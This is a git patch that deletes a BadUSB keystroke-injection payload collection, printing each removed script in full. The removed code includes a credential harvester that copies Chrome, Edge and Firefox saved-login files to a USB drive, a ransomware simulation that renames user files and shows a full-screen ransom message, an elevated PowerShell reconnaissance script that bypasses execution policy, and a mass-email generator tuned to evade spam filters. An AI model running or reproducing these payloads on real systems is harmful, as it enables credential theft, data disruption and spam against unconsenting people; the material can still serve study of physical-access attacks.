From a051c3a3dc98da0ddd05138fbf1890249a0d33e8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:29:49 -0400 Subject: [PATCH] Delete BadUSB/MarkCyber-BadUSB directory --- .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 -- .../Emails/GenerateEmailSend.py | 101 --- .../HackerStuff/CredentialHarvester.txt | 54 -- .../HackerStuff/VulnerabilityScanner.txt | 630 ------------------ .../RansomwareSimCleanup.txt | 62 -- .../RansomwareSimMain.txt | 91 --- 6 files changed, 979 deletions(-) delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt deleted file mode 100644 index f484d3ec..00000000 --- a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt +++ /dev/null @@ -1,41 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% -REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% -REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% -REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% -REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 500 -STRING chrome -ENTER -DELAY 1000 -STRING https://mail.google.com/mail/u/0/#inbox?compose=new -ENTER -DELAY 5000 -DELAY 1000 -STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} -DELAY 500 -TAB -TAB -STRING {YOUR SUBJECT NAME} -TAB -STRING Hi {THEIR NAME} -ENTER -ENTER -STRING {CONTENTS OF THE EMAIL} -ENTER -ENTER -STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} -ENTER -ENTER -STRING Respectfully, -ENTER -ENTER -STRING {YOUR NAME} -ENTER -CTRL ENTER -DELAY 5000 -DELAY 1000 -ALT F4 diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py deleted file mode 100644 index 16662391..00000000 --- a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py +++ /dev/null @@ -1,101 +0,0 @@ -####################################################################################################################################### -####################################################################################################################################### -################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### -################# This is a python script to automatically create BadUSB scripts to auto send emails #################### -################# This takes a excel sheet with the columns named "Names" and "Emails" #################### -################# This script will then make a badusb script using the name + email of each person #################### -################# There are various subject options that will be chosen from, to minimize "spam" #################### -################# Change the signature to your name, and put subject options that fit your email #################### -################# Lastly, of course make sure to change the contents of the email to what you want #################### -####################################################################################################################################### -####################################################################################################################################### - -import pandas as pd -import random - -# Load the Excel file, make sure it has the same name (or change the name in this script) -file_path = 'NameAndEmails.xlsx' -data_df = pd.read_excel(file_path) - -# Your excel should have 2 columns. Names, and Emails. -data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) -data_cleaned_df.columns = ['Name', 'Email'] - -# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not) -subject_options = [ - "Placeholder for subject option 1", - "Placeholder for subject option 2", - "Placeholder for subject option 3", - "Placeholder for subject option 4", - "Placeholder for subject option 5", - "Placeholder for subject option 6", - "Placeholder for subject option 7" -] - -# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. -# Just modify the actual email body and sender name to fit your needs -email_body_template = """ -Hi {name}, - -Placeholder for email body. - -Warm Regards, -Sender Name -""" - -# Function to generate BadUSB script -def generate_badusb_script_with_placeholders_single_file(data_df): - script_template = [ - "DELAY 1000", - "GUI r", - "DELAY 500", - "STRING chrome", - "ENTER", - "DELAY 1000", - "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. - "ENTER", - "DELAY 5000" - ] - - scripts = script_template - - for index, row in data_df.iterrows(): - name = row['Name'] - email = row['Email'] - subject = random.choice(subject_options) - random_delay = random.randint(10000, 25000) - - email_body_lines = email_body_template.format(name=name).strip().split('\n') - email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] - - email_script = [ - "DELAY 1000", - f"STRING {email}", - "DELAY 500", - "TAB", - "TAB", - f"STRING {subject}", - "TAB" - ] + email_body_lines + [ - "ENTER", - "CONTROL ENTER", - "DELAY 5000", - f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam - "ALT F4" - ] - - scripts += email_script - - return "\n".join(scripts) - -# Generate the BadUSB script with placeholders and proper send command in a single file -final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) - -# Save the script to a file -final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script -with open(final_script_file_path, 'w') as file: - file.write(final_script_with_placeholders) - -print(f"Script saved to {final_script_file_path}") - -#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt deleted file mode 100644 index d7a27cea..00000000 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt +++ /dev/null @@ -1,54 +0,0 @@ -REM ################################################################################################################## -REM ############## This script was created by github.com/markcyber ############## -REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## -REM ############## The extracted data will require decryption ############## -REM ################################################################################################################## -REM Open PowerShell -DELAY 1000 -GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER -DELAY 1000 -REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; -STRING if ($usbDrive -ne $null) { -ENTER -DELAY 500 -STRING cd $usbDrive; -ENTER -DELAY 500 -STRING mkdir BrowserData; -ENTER -DELAY 500 -STRING cd BrowserData; -ENTER -DELAY 500 -REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } -ENTER -DELAY 500 -REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } -ENTER -DELAY 500 -REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } -ENTER -DELAY 500 -STRING } -ENTER -DELAY 500 -REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) -STRING echo off | clip -ENTER -DELAY 500 -REM Close PowerShell -STRING exit -ENTER -DELAY 500 -REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt deleted file mode 100644 index 51e1b0d0..00000000 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt +++ /dev/null @@ -1,630 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -REM Open Start Menu -CONTROL ESCAPE -DELAY 2000 -STRING powershell -REM Navigate to the context menu to run PowerShell as an administrator -DELAY 500 -RIGHTARROW -DELAY 100 -DOWNARROW -DELAY 100 -ENTER -DELAY 3000 -ALT Y -DELAY 5000 -REM Set PowerShell Execution Policy to Bypass -DELAY 1000 -STRING set-executionpolicy bypass -scope process -force -DELAY 200 -ENTER -DELAY 200 -REM Create the PowerShell script in memory and execute it -DELAY 200 -STRING $usbName = "MYUSB" -DELAY 200 -ENTER -DELAY 200 -STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter -DELAY 200 -ENTER -DELAY 200 -STRING if ($usbDrive) { -DELAY 200 -ENTER -DELAY 200 -STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName -DELAY 200 -ENTER -DELAY 200 -STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner -DELAY 200 -ENTER -DELAY 200 -STRING New-Item -ItemType Directory -Path $directoryPath -DELAY 200 -ENTER -DELAY 200 -STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" -DELAY 200 -ENTER -DELAY 200 -STRING "" > $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING function check-passwordpolicy { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING net accounts -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking password policy: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function audit-services { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-service | select-object name, displayname, status, starttype -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error auditing services: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-networksettings { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-netipconfiguration -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking network settings: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-softwarevulnerabilities { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking software vulnerabilities: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-cve { -DELAY 200 -ENTER -DELAY 200 -STRING param ( -DELAY 200 -ENTER -DELAY 200 -STRING [string]$productname, -DELAY 200 -ENTER -DELAY 200 -STRING [string]$version -DELAY 200 -ENTER -DELAY 200 -STRING ) -DELAY 200 -ENTER -DELAY 200 -STRING $initialDelay = 2 -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds $initialDelay -DELAY 200 -ENTER -DELAY 200 -STRING $response = invoke-restmethod -uri $uri -method get -DELAY 200 -ENTER -DELAY 200 -STRING if ($response.totalresults -gt 0) { -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($cve in $response.result.cve_items) { -DELAY 200 -ENTER -DELAY 200 -STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING "no cves found for $productname $version" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking CVEs: $_" -DELAY 200 -ENTER -DELAY 200 -STRING if ($_.Exception -match '403') { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds 60 -DELAY 200 -ENTER -DELAY 200 -STRING $retryResponse = invoke-restmethod -uri $uri -method get -DELAY 200 -ENTER -DELAY 200 -STRING if ($retryResponse.totalresults -gt 0) { -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($cve in $retryResponse.result.cve_items) { -DELAY 200 -ENTER -DELAY 200 -STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING "no cves found for $productname $version" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function analyze-logs { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-eventlog -logname system -newest 100 -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error analyzing logs: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-openports { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING netstat -an -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking open ports: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-missingupdates { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Checking Windows Update logs..." -DELAY 200 -ENTER -DELAY 200 -STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" -DELAY 200 -ENTER -DELAY 200 -STRING Get-WindowsUpdateLog -LogPath $updateLogPath -DELAY 200 -ENTER -DELAY 200 -STRING write-output "WindowsUpdate.log written to $updateLogPath" -DELAY 200 -ENTER -DELAY 200 -STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error getting Windows Update log: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-firewallstatus { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING netsh advfirewall show allprofiles -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking firewall status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-smbv1status { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-windowsoptionalfeature -online -featurename smb1protocol -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking SMBv1 status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-antivirusstatus { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-mpcomputerstatus -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking antivirus status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING check-passwordpolicy >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING audit-services >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-networksettings >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-softwarevulnerabilities >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING analyze-logs >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-openports >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-missingupdates >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-firewallstatus >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-smbv1status >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-antivirusstatus >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -REM Dynamically identify critical software from running processes and scheduled tasks -STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique -DELAY 200 -ENTER -DELAY 200 -STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique -DELAY 200 -ENTER -DELAY 200 -REM Combine running software and scheduled tasks -STRING $softwareList = @() -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($process in $runningSoftware) { -DELAY 200 -ENTER -DELAY 200 -STRING $softwareList += $process.Name -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($task in $scheduledTasks) { -DELAY 200 -ENTER -DELAY 200 -STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -REM Remove duplicates and empty entries -STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } -DELAY 200 -ENTER -DELAY 200 -REM Check CVEs for identified software -STRING foreach ($software in $softwareList) { -DELAY 200 -ENTER -DELAY 200 -STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion -DELAY 200 -ENTER -DELAY 200 -STRING if ($version) { -DELAY 200 -ENTER -DELAY 200 -STRING check-cve -productname $software -version $version >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds $initialDelay -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Results saved to USB drive." -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error: USB drive MYUSB not found." -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING invoke-command -scriptblock $script -DELAY 200 -ENTER -DELAY 20000 -REM check out github.com/markcyber for more badusb/pen testing scripts and tools diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt deleted file mode 100644 index 3be26299..00000000 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt +++ /dev/null @@ -1,62 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 2000 -STRING powershell -ENTER -REM increased delays to make sure each command can go through even on slower computers -DELAY 6000 -REM Define the locations using correct SpecialFolder enumerations -STRING $folders = @( -DELAY 1000 -ENTER -DELAY 1000 -STRING [System.Environment+SpecialFolder]::Desktop, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyPictures, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyMusic, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::Downloads -DELAY 1000 -ENTER -DELAY 2000 -STRING ) -DELAY 1000 -ENTER -DELAY 3000 -REM Iterate over each location -STRING foreach ($folder in $folders) { -DELAY 1000 -ENTER -DELAY 1000 -STRING $path = [Environment]::GetFolderPath($folder) -DELAY 1000 -ENTER -DELAY 4000 -REM Get all .locked files in the path and rename them back -STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } -DELAY 2000 -ENTER -DELAY 5000 -STRING } -DELAY 1000 -ENTER -DELAY 4000 -STRING exit -DELAY 1000 -ENTER -REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt deleted file mode 100644 index b35bd533..00000000 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt +++ /dev/null @@ -1,91 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 1000 -REM opens powershell (this is for windows machines) -STRING powershell -ENTER -DELAY 3000 -REM Define the locations using correct SpecialFolder enumerations -STRING $folders = @( -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::Desktop, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::MyPictures, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::MyMusic, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::Downloads -DELAY 500 -ENTER -DELAY 500 -STRING ) -DELAY 500 -ENTER -DELAY 500 -REM Iterate over each location -STRING foreach ($folder in $folders) { -DELAY 500 -ENTER -DELAY 500 -STRING $path = [Environment]::GetFolderPath($folder) -DELAY 500 -ENTER -DELAY 500 -REM Get all files in the path and rename them -STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } -DELAY 500 -ENTER -DELAY 500 -STRING } -DELAY 500 -ENTER -DELAY 2000 -REM Display ransomware message -STRING Add-Type -AssemblyName PresentationFramework -DELAY 500 -ENTER -DELAY 500 -STRING $Window = New-Object System.Windows.Window -DELAY 500 -ENTER -DELAY 500 -STRING $Window.WindowStartupLocation = 'CenterScreen' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.WindowState = 'Maximized' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.Topmost = $true -DELAY 500 -ENTER -DELAY 500 -STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.ShowDialog() -DELAY 500 -ENTER -DELAY 2000 -STRING exit -DELAY 500 -ENTER -REM check out my github at github.com/markcyber for more badusb & hacking type tools